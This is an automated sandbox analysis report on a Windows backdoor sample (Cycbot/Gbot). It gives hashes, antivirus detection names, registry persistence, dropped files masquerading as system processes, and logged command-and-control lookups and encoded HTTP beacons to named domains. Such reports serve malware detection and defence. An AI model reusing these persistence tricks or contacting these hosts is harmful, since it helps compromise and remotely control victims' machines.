Analysis Date: 2014-06-05 13:38:12
MD5: ad0439feca22f0db9a5f0606bad93cae
SHA1: 10c5af9add558349b4c7edea3c5f1645e399f497

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: f9a1e8cd5aaf3df97ca71303cefce09c sha1: 60949a5fdc79c9c00dac853dff1257bf704ea365 size: 113152
Section: .rdata md5: 6b6f436af49524fe75458f833efc1930 sha1: 8d7afd51413bb304b93df973ddf58a61c7413647 size: 1024
Section: .data md5: 5a01e116d042b30d235bd91e7e96f3a0 sha1: 27eafd33e6f6572c24d6ce0f1421861c75c32725 size: 72704
Section: .reloc md5: 705f1a5ea90b0ee357983406cd843c18 sha1: 4bdc3d5b06e917a90070997031740aa0590574c1 size: 1024
Timestamp: 2005-11-16 15:28:17
PEhash: a9e2240dbb23773f78c3d42c169d67f4c2bf53fc
IMPhash: cda14aa5d568cdb73bd081812a5a8d81
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Cycbot-118
AV Dr. Web: BackDoor.Gbot.73 - infected, incurable
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.TFW
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: win32/Gbot.AX
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Trojan
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: autowebtech.com
Winsock DNS: 127.0.0.1
Winsock DNS: yourmediaresources.com
Winsock DNS: coolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: autowebtech.com, Type: A, 216.185.44.143
DNS: zonedg.com, Type: A, 208.73.211.177
DNS: zonedg.com, Type: A, 208.73.211.182
DNS: zonedg.com, Type: A, 208.73.211.236
DNS: zonedg.com, Type: A, 208.73.211.249
DNS: zonedg.com, Type: A, 208.73.211.164
DNS: yourmediaresources.com, Type: A
DNS: coolmediastore.com, Type: A
HTTP GET: http://autowebtech.com/images/133.jpg?v35=48&tq=gKZEtzyKiCeEOtJ1i6IMirdV6PxcT7RVjWW7Jbl4ZaZF1A%2BSdZAoHTjNzF0o5v%2FlkECbClis8wdtk5AHNXaefjwwq8y%2F7OuytUE5CcawzLQGDg2ea991RjsFK9UqCgGEpRDcxH0KlzcW8%2BKduST2Gb%2FW4PDx2swi%2BApN2vaD6xnm1ajNueDplUSpf6mc%2B6SWUrdU5bzjbMb9W8p2Fp1WXVLIlHkyCSVmUZH5jTnxwMflIsEfZ8RFDmU5y9n9s9ibmTPEcge3g6akzzcRSe%2F%2BSQTEvkWDiCg8xgd8LIA7Uc2D%2BYZVZYnIsayzEEYNMp2TeIZqZV1G09aKRkjxWxxs4MYMYmXjT6OmUTrWtPmgniuBWejtwxFyfvsZUR6Nf%2BP%2F8K7Iw95QVVavyO%2FTPgLiIKYgfOpSX9gk%2B0yIKnXgndGeQ8gpdHsDblDqikM7j9rdBa2diVpWFDaUWxv5%2FtOfCIV%2BFbMQsIX0tCwRgQV7WN%2Bas0SJgaa
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 216.185.44.143:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.177:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.177:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.177:80

Raw Pcap


Strings